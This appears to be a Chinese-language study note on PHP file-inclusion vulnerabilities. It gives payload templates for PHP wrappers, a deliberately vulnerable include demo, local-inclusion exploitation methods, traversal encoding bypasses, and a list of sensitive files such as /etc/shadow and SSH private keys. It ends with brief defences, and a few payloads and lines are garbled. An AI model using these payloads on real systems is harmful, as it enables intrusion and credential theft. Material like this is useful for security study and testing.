文件包含漏洞模板
文件包含读取
?file=php://filter/convert.base64-encode/resource=xxx.php
?file=php://filter/read=convert.base64-encode/resource=xxx.php
文件包含
?file=php://input
?file=file://c:\boot.ini
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
?file=phar://xxx.png/shell.php
?file=zip://xxx.png#shell.php
文件包含漏洞基础
include_demo.php:
<?php
echo "文件包含demo";
include($_REQUEST['file']);
?>test.txt
下面有一个有效的php代码。
<?php
phpinfo();
?>访问: http://主机名/include_demo.php?file=test.txt
文件包含开关
allow_url_fopen:打开远程文件
allow_url_include:包含远程文件用
文件包含相关函数有何区别?
require() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。 include() 如果出错的话,只会提出警告,会继续执行后续语句。
require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含 过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等 问题。
文件包含漏洞
后端程序在包含文件的功能的时候,如果被包含的文件路径可被攻击者控制,导致攻击者提供的包含动 态脚本的文件被执行。
文件包含漏洞危害?
条件满足的情况下:
1.通过包含敏感路径文件,导致密码等信息泄露,如包含各类配置文件、数据库文件等
2. 通过包含含有php代码的文件,该漏洞导致代码执行
3. 同文件上传联用,导致getshell
4. 如果开启allow_url_include开关,还可包含攻击者远程服务器上自定义的php代码文件。
文件包含漏洞分类?
1. LFI(Local File Include),本地文件包含
2. RFI(Remote File Include),远程文件包含
文件包含漏洞原理
后端文件包含函数加载的参数没有经过过滤或者严格的限制,并且可以被用户控制用来包含其他恶意文 件,导致了执行非预期的代码。
如何发现文件包含漏洞?
1. 通过url发现可能存在文件包含的漏洞点,如:
?file=
?f=
?source=
?src= 下面有一个有效的php代码。
?path=
?inc=
?include=
?dest=
2. 代码审计发现
本地文件包含的利用姿势
1、利用session文件包含
2、利用log日志文件包含
3、结合文件上传包含
4、包含proc/self/environ中的user-agent头
5、包含ssh.log文件we
6、包含fd文件
7、利用竞争条件包含临时文件
利用条件
有潜在文件包含漏洞点
知道被包含文件路径
如果要getshell,还要被包含的文件内容可控
文件包含漏洞的利用步骤?
找到文件包含的功能点
构造被包含的文件及其内容(如上传、远程服务器提供文件=
文件包含漏洞利用绕过
- NULL(%00)截断绕过(php)
- TODO:超长字符绕过(Windows可在文件名后部添加点增加长度,linux必须在前面添加./增加长 度)?或#绕过(受php版本限制)
- 利用php伪协议绕过
- 利用smb绕过
伪协议的使用
php://filter
打开一个文件输入输出流进行读写,常结合base64编码读写不可直接读取的数据
php://filter/read/convert.base64-encode/resource=tmp.phpphp://input
同样是打开文件输入输出流进行文件内容写入,一般都是通过POST请求方式写入文件内容
php://input
POST提交:php phpinfo();?>
data://
data协议同样是打开输入输出流,写入文件内容。使用data伪协议的时候,最好省略掉php语法中最后 的?>符
data://text/plain,?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== (这里的base64编码省略了?>)
phar://
phar://主要适用于压缩包zip文件的读取,文件路径可用相对路径也可用绝对路径。利用条件:php版本 大于5.3.0
phar://../../phpinclude/phpinfo.zip/phpinfo.txt (相对路径)
phar://c:/wamp/www/phpinclude/phpinfo.zip/phpinfo.txt (绝对路径)
zip://
用法同phar大致差不多,但只能使用绝对路径。利用条件:php版本大于5.3.0
zip://c:/wamp/www/phpinclude/phpinfo.zip%23phpinfo.txt (压缩包内路径需要用%23代替/)
文件包含的绕过方法
绕过前缀过滤
使用目录穿越../来绕过,../被过滤可通过编码变形绕过
1 ../的编码
- %2e%2e%2f
- ..%2f
- %2e%2e/
2 ..\的编码
- %2e%2e%5c
- ..%5c
- %2e%2e\
3.二次编码
- %252e%252e%252f(编码的../)
- %252e%252e%255c(编码的..\)
4.容器/服务器的目录穿越编码
- ..%c0%af(编码的../)
5.java的目录穿越编码
- %c0%ae%c0%ae/(编码的../)
注:java中会把”%c0%ae”解析为”\uC0AE”,最后转义为ASCII字符的”.”(点)
6.Apache Tomcat 的目录穿越编码
- ..%c1%9c(编码的..\)
- 绕过后缀过滤
- 利用远程包含绕过
- 利用url锚点绕过 http://xxx.com/shellaksdjfgaksdjfg252.phpxxx.jpg
- 利用00截断绕过 (php < 5.3.4)
- 利用操作系统长字符截断绕过(php < 5.2.9)
- 利用phar或zip伪协议绕过
常见敏感文件
C:\boot.ini
C:\windows\System32\inetsrv\MetaBas.xml
C:\windows\repair\sam
C:\program Files\mysql\my.ini
C:\program Files\mysql\data\mysql\user.MYD
c\windows\php.ini
C\windows\my.ini
---------------------------------------------o----------------
linux特殊文件:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd*
/proc/mounts/porc/config.gz
/var/lib/mlocate/mlocate.db
locate mlocate.db www文件包含漏洞如何防御或修复
在保证可用性和功能的前提下:
- 过滤点号
- 过滤斜杠
- 升级中间件及动态脚本解析程序
- 配置open_basedir的值,限定读写范围
- 关闭allow_url_include
- 对上传文件内容进行排查或进行转存,破坏上传文件中的恶意代码